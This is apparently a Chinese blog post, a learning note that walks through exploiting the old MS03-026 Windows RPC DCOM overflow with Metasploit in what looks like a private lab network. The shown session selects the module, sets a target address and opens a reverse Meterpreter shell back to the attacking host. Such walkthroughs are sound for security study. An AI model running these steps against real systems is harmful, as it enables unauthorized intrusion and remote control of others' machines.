zoukankan      html  css  js  c++  java
  • metasploit学习之ms03_026

    傻瓜式利用ms03_026_dcom:

    Matching Modules
    ================
    
    Name Disclosure Date Rank Description
    ---- --------------- ---- -----------
    auxiliary/scanner/telnet/telnet_ruggedcom normal RuggedCom Telnet Password Generator
    exploit/windows/dcerpc/ms03_026_dcom 2003-07-16 great MS03-026 Microsoft RPC DCOM Interface Overflow
    exploit/windows/smb/ms04_031_netdde 2004-10-12 good MS04-031 Microsoft NetDDE Service Overflow
    exploit/windows/smb/psexec_psh 1999-01-01 manual Microsoft Windows Authenticated Powershell Command Execution
    
    
    msf > use exploit/windows/dcerpc/ms03_026_dcom //设置漏洞代码
    msf exploit(ms03_026_dcom) > show options
    
    Module options (exploit/windows/dcerpc/ms03_026_dcom):
    
    Name Current Setting Required Description
    ---- --------------- -------- -----------
    RHOST yes The target address
    RPORT 135 yes The target port
    
    
    Exploit target:
    
    Id Name
    -- ----
    0 Windows NT SP3-6a/2000/XP/2003 Universal
    
    
    msf exploit(ms03_026_dcom) > set RHOST 10.0.0.5
    RHOST => 10.0.0.5
    msf exploit(ms03_026_dcom) > exploit
    
    [*] Started reverse handler on 10.0.0.100:4444 
    [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
    [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.0.0.5[135] ...
    [*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.0.0.5[135] ...
    [*] Sending exploit ...
    [*] Sending stage (770048 bytes) to 10.0.0.5
    [*] Meterpreter session 1 opened (10.0.0.100:4444 -> 10.0.0.5:1231) at 2015-04-25 17:08:20 +0800
    
    meterpreter >       //成功了!
  • 相关阅读:
    context:componentscan 分析
    分布式计算
    分布式数据库
    Windows界面编程第四篇 异形窗体 高富帅版
    图解如何在VC6,VS2008中设置程序条件断点
    makefile的语法以及写法
    KMP字符串模式匹配算法
    VC中操作excel表格
    Windows界面编程第二篇 半透明窗体
    Windows界面编程第一篇 位图背景与位图画刷
  • 原文地址:https://www.cnblogs.com/iDerr/p/4456222.html
Copyright © 2011-2022 走看看